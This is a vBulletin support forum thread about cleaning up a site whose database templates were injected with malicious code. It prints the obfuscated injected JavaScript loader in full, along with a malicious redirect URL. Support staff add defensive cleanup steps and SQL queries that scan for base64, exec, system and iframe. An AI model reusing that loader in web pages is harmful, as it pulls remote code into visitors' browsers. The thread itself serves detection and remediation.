A fix if your site is already exploited

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Mitchh
    New Member
    • Sep 2009
    • 5
    • 3.8.x

    [Forum] A fix if your site is already exploited

    Hey guys,

    I've seen this more then a few times and it's all the same problem. Some code gets injected into the database on the template table. Here is the code:

    Code:
    var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);
    If you decode the numbers from the second fromCharCode() you get the following URL:



    This URL loads http://directmarketingmanage.in/in.cgi?walter into a secret iframe, which some antivirus softwares like Avast complain about. To fix the problem go in phpMyAdmin, go to your database then hit search. Look for 'vBulletin_init' without the quotes in only the template table. On this page just right click edit on every one it found and open in a new tab. Now just search on the page for vBulletin_init til you find it in the table and remove the code listed above. How this got injected into my database I have no idea.. can has patch?
  • Trevor Hannant
    vBulletin Support
    • Aug 2002
    • 24325
    • 5.7.X

    #2
    What modifications are you running?
    Vote for:

    - Admin Settable Paid Subscription Reminder Timeframe (vB6)
    - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)

    Comment

    • Mr Jolly
      Member
      • Feb 2008
      • 93
      • 3.6.x

      #3
      Does this really fix it for good?

      Comment

      • Wayne Luke
        vBulletin Technical Support Lead
        • Aug 2000
        • 73981

        #4
        Originally posted by Mr Jolly
        Does this really fix it for good?
        Doubtful. Can't fix it for good without knowing the vector it was inserted in. Since it can only be found via a database search and not by looking in the footer template, the exploit points to a direct database insertion either via remote access to the database or through a plugin installed in the system. The following steps will check your code for compromises.

        1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

        2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

        3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

        4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

        5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

        6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

        Query for step 4 and 5 -
        SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

        7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

        It checks the templates for compromising code.

        8) Check .htaccess to make sure there are no redirects there.
        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API

        Comment

        • Mr Jolly
          Member
          • Feb 2008
          • 93
          • 3.6.x

          #5
          I've uninstalled all the plugins I was using and removed all the files associated with them. Had a right good clear out. I have kept vBSEO though, and to be honest I think they're in the clear. I've seen another forum with this same problem and they weren't running vBSEO, so fingers crossed on that one.

          Comment

          • .Josh
            Senior Member
            • Dec 2009
            • 129
            • 4.1.x

            #6
            What mod/plugin was doing this?

            Comment

            • Wayne Luke
              vBulletin Technical Support Lead
              • Aug 2000
              • 73981

              #7
              Originally posted by .Josh
              What mod/plugin was doing this?
              No one has established that it is indeed a mod or plugin causing the problem. That is just one possible vector for exploits.
              Translations provided by Google.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API

              Comment

              • Mr Jolly
                Member
                • Feb 2008
                • 93
                • 3.6.x

                #8
                Originally posted by .Josh
                What mod/plugin was doing this?
                What plugins do you use and we'll compare which one's it could have been.

                Comment

                • Mark.B
                  vBulletin Support
                  • Feb 2004
                  • 24286
                  • 6.0.X

                  #9
                  Originally posted by Mr Jolly
                  What plugins do you use and we'll compare which one's it could have been.
                  That's not necessarily helpful, it panics people.
                  MARK.B
                  vBulletin Support
                  ------------
                  My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
                  My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

                  Comment

                  • mainframe
                    Senior Member
                    • Jul 2004
                    • 151
                    • 3.6.x

                    #10
                    Originally posted by Mark.B
                    That's not necessarily helpful, it panics people.
                    Yes, but it would also help to identify the problem, in cases of SQL injection it's vital to find this fast.
                    Sat-Television.com Forum:
                    http://www.satfriends.com/

                    Sat-Television.com Upload Center:
                    http://www.satfriends.com/ulc.php

                    Comment

                    • Wayne Luke
                      vBulletin Technical Support Lead
                      • Aug 2000
                      • 73981

                      #11
                      Originally posted by mainframe
                      Yes, but it would also help to identify the problem, in cases of SQL injection it's vital to find this fast.
                      Unless you know PHP and review the code of all your plugin's you'll never be able to find a SQL Injection by comparing Addons. If you're looking for a SQL injection, you should review your web access log because these are done via the URL.

                      A plugin can do direct access to the database as it has access to vBulletin's engine. As such it doesn't need to resort to SQL Injections, it just runs code.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud demonstration site.
                      vBulletin 5 API

                      Comment

                      • Jaxo
                        Member
                        • Dec 2011
                        • 36

                        #12
                        I had this same problem,..turned out to be a blue pearl skin

                        "EDIT"

                        Idk what is causing this prob,. not the skin after reinstall
                        Last edited by Jaxo; Thu 1 Mar '12, 3:08pm.

                        Comment

                        • ZeroHour
                          Senior Member
                          • Sep 2007
                          • 167

                          #13
                          Originally posted by Jaxo
                          I had this same problem,..turned out to be a blue pearl skin

                          http://www.bluepearl-skins.com/forum...-into-website/
                          Erm have they confirmed that or have you found the code in the template files xml?
                          If someone breached they would put the template edit into your default style which was blue pearl but not nessarily the master/every style.
                          Try reimporting the skin or doing a search for the code in the skins import xml.

                          Comment

                          • Jaxo
                            Member
                            • Dec 2011
                            • 36

                            #14
                            Thanks Zero hour, I will try this now and post back...

                            TBH this whole vbulletin thing is a let down,. I ran a phpBB site for 3 years and dont know why i bothered moving to vb,. basically imo its an unsafe unreliable product.. 2 months ive had it and have had it so far and everytime I update it there is another frecking update.. can they not do it correct the first time or is it just an unsecure product?
                            Last edited by Jaxo; Thu 1 Mar '12, 3:07pm.

                            Comment

                            • Jaxo
                              Member
                              • Dec 2011
                              • 36

                              #15
                              Ok, It appears you are correct,. I removed the skin and reinstalled and its clean// Thank you

                              I notice original post is from 2009,.. still no proper fix for this?

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...